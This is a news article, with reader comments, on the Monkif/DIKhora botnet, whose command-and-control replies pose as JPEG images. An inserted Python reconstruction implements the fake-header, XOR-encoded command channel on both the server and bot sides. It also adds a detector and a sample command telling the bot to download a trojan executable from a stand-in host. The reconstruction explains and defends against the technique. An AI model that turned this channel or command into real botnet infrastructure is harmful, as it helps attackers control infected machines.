New botnet hides commands as JPEG images

Security researchers have stumbled on a new botnet that uses an interesting technique to mask its nefarious intentions.

The Monkif/DIKhora botnet, which is pushing Trojan downloaders to infected machines, encodes its instructions so that each reply from the command-and-control server looks like a JPEG image file, according to SecureWorks researcher Jason Milletary. The disguise lives entirely in the HTTP response; no real image is involved.

Milletary explains:

The server sets the HTTP Content-Type header to "image/jpeg" and prefaces the bot commands with a fake 32-byte JPEG header. The bot checks if the header matches and decodes the rest of the response to retrieve its commands. The commands are encoded using a single byte XOR with 0x4. The malware that CTU has observed being installed by Monkif is a BHO (Browser Helper Object) trojan commonly referred to as ExeDot, which performs Ad Hijacking and Ad Clicking.

The Trojan associated with this botnet also attempts to disable anti-virus and personal firewall software to maintain its foothold on the system.
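The exchange described above, reconstructed as an added example (not code from the article or from SecureWorks): the server side builds the fake "image" response, the bot side checks the fake header and XOR-decodes the tail, and a defender-side check flags image/jpeg responses that are not actually JPEGs. The report only gives the header length (32 bytes), the Content-Type and the XOR key (0x04); the contents of the fake header, the command text and the HTTP framing below are constructed for illustration.

```python
"""
Monkif/DIKhora-style C&C response: Content-Type image/jpeg, a fake 32-byte
"JPEG header", then commands XOR-encoded with the single byte 0x04.
FAKE_HEADER and the sample command are constructed stand-ins; the real
bot's header bytes are not given in the article.
"""

XOR_KEY = 0x04              # single-byte key reported by SecureWorks CTU
FAKE_HEADER_LEN = 32        # fake header length reported by CTU
JPEG_SOI = b"\xff\xd8\xff"  # bytes every genuine JPEG actually starts with

# Hypothetical fake header (14 ASCII bytes + 18 binary bytes = 32 bytes).
FAKE_HEADER = b"JFIF-FAKE-HDR-" + bytes(range(18))
assert len(FAKE_HEADER) == FAKE_HEADER_LEN


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR; encoding and decoding are the same operation."""
    return bytes(b ^ key for b in data)


def build_cnc_response(command: str) -> bytes:
    """Server side: wrap an XOR-encoded command in a response that claims to be a JPEG."""
    body = FAKE_HEADER + xor_bytes(command.encode("ascii"))
    headers = (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: image/jpeg\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    ).encode("ascii")
    return headers + body


def split_http(raw: bytes):
    """Return (headers as a lower-cased dict, body) for a raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    hdrs = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        hdrs[name.strip().lower().decode()] = value.strip().decode()
    return hdrs, body


def bot_decode(raw: bytes):
    """Bot side: accept the reply only if the fake header matches, then XOR-decode the rest."""
    hdrs, body = split_http(raw)
    if hdrs.get("content-type") != "image/jpeg":
        return None
    if body[:FAKE_HEADER_LEN] != FAKE_HEADER:
        return None
    return xor_bytes(body[FAKE_HEADER_LEN:]).decode("ascii", errors="replace")


def looks_like_jpeg(body: bytes) -> bool:
    """Cheap structural check: a real JPEG begins with the SOI marker FF D8 FF."""
    return body.startswith(JPEG_SOI)


def inspect_response(raw: bytes) -> dict:
    """Defender side: flag a response that claims image/jpeg but is not a JPEG and
    whose bytes past the 32-byte header decode to printable text under key 0x04."""
    hdrs, body = split_http(raw)
    result = {
        "claims_jpeg": hdrs.get("content-type", "").startswith("image/jpeg"),
        "is_jpeg": looks_like_jpeg(body),
        "suspicious": False,
        "decoded": None,
    }
    if result["claims_jpeg"] and not result["is_jpeg"]:
        candidate = xor_bytes(body[FAKE_HEADER_LEN:])
        if candidate and all(0x20 <= b < 0x7F or b in b"\r\n\t" for b in candidate):
            result["suspicious"] = True
            result["decoded"] = candidate.decode("ascii")
    return result


if __name__ == "__main__":
    # Constructed command; example.invalid is a reserved, non-resolving name.
    wire = build_cnc_response("download http://example.invalid/exedot.exe")
    print("bot sees:", bot_decode(wire))
    print("detector:", inspect_response(wire))
```

Two practical notes. First, XOR with 0x04 maps printable ASCII almost entirely onto printable ASCII, so the "encoded" commands are still readable in a packet capture once you know to skip the first 32 bytes; it defeats string matching, not analysis. Second, the SOI check above is only a first filter: it relies on the fake header not starting with FF D8 FF, which the article does not confirm either way, so a proxy that wants to be strict should validate the JPEG segment structure rather than the first three bytes.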


Talkback

49 comments
  • What, that's it?

    That's it for this article?

    No mention of how prolific it is; what defenses might exist; how to check for its presence; anything?

    Without more information, you're fear-mongering. Next time, just type "Boo!".


    finder@...
    • What, that's it?

      "Without more information, you're fear-mongering. Next time, just type "Boo!"."


      I think it's called getting info out there for all to see. Fear mongering? I don't think so.
      Franciscus101
      • Still

        It might help to get some quotes from a few major AV vendors. I would love to know if mine is aware and protecting me against this.
        djmik
        • protecting you against what?


          Protecting you against what? If you are trojaned already, then it's too late.

          this is just an article about C&C. Not sure why everyone is so negative about it. How is it fear mongering to talk about methods of controlling bot-nets?

          Is it the JPEG part that is scaring everyone?
          zdnet-registraion
          • jpeg

            "Is it the JPEG part that is scaring everyone? "
            Unfortunately... yes.
            Ceridan
    • Huh? The "defenses" are not to join the botnet. Did you even RTFA?

      If you did, you would know there's nothing "fearful" about it. Instead of the botnet being administered with plain text commands, it's being administered with plain text commands prefixed by a fake jpeg header. This changes nothing.

      In fact it's actually rather pathetic; there are already free, open sourced algorithms out there for [i]real[/i] steganography, I can't believe botnets aren't using such methods for their communications yet. This is just sad.
      AzuMao
  • SC Magazine Content

    This article doesn't belong in the wild anymore than a botnet. While it is extremely interesting, you make it sound like the botnet is spreading via JPEG's (which it is not).
    Nothing like a half article (talking about the command and control) without the other half (how is the bot propagating, what does it do, how long has it been out there. You know, the basic who, what, where, when, how and why.)
    rjacksix
    • Great post. Botnet is NOT spreading through JPEG

      Excellent point and I want to make sure your post gets read. The botnet is NOT spreading through JPEG. This is probably just another trojan botnet which, according to the ZDNet rules of what counts and what doesn't, doesn't count.

      Oops, I forgot the #1 rule of what counts and what doesn't: If it affects MS software, it counts, no matter what.

      Cue the double standards...
      NonZealot
      • So basically it's just another ordinary bot

        But this one uses JPGs to communicate. If it was really smart the commands would be a watermark that could be in any image. If it was even smarter it would be in plain old HTML too.
        T1Oracle
        • Nope, it isn't even using JPEGs to communicate

          It is using the HTTP content type image/jpeg to hide its communications in a fake JPEG header. If I understand correctly, there isn't even a valid JPEG anywhere in the equation.
          NonZealot
          • true that but

            Unfortunately, people see: botnet hides JPEG images.... and not botnet hides commands as JPEG images...
            Ceridan
          • botnet hides commands as JPEG images

            I got it. I don't know who these other people are.
            abeassocs
  • What's with all the posts bagging the article?

    The first line says it all...

    [i]Security researchers have stumbled on a new botnet that uses an interesting technique to mask its nefarious intentions.[/i]

    There's a link to the source article (which BTW doesn't have much more info than this one).

    And why is it the authors problem if you misread or misunderstood the article?

    Thanks for the info Ryan!
    iTeaBoy
    • Title Not Even Accurate

      The title isn't even accurate. The commands are not in JPEG images, they emulate the first few bytes but are not "images".
      rjacksix
  • RE: New botnet hides commands as JPEG images

    Another article that fails to tell us that this is a Windows problem.
    gertruded
    • Uh?

      Crafting a header and a content-type is rather easy and it's cross-platform compatible. So hiding COMMANDS as if it's a JPEG to avoid detection of said commands by a firewall is actually interesting...

      And again, since HTTP responses are sent as ASCII (cross-browser/cross-platform, etc.) you cannot be protected from a method that an already resident trojan is using to receive said HTTP responses simply by being on a Mac or on Ubuntu (or other Linux).

      Please don't confuse a propagation vector with simple client/server behaviour.

      PS: The trojan might or might not be Windows; it does not matter, since the article speaks of a communication scheme between a botnet client and a botnet C&C server.

      EDIT: mixed MIME and HTTP content-type, which are similar in a way but...
      Ceridan
    • Should I feed the troll gertruded, or not?

      But then again, the more we do, the more you come back with the usual "Micro$oft sucks, blah, blah, blah" post.

      GuidingLight
      • truth is truth, no matter how often it is repeated

        [i]the more you come back with the usual "Micro$oft sucks, blah, blah, blah" post.[/i]

        This trojan specifically targets IE by installing a BHO. Naturally, BHOs are specific to IE on Windows.

        So, MSFT will continue to suck until it can create a decently-secure software stack.
        Media Whore
  • Sounds reminiscent of FrogExer

    Using image files doesn't surprise me.
    mechBgon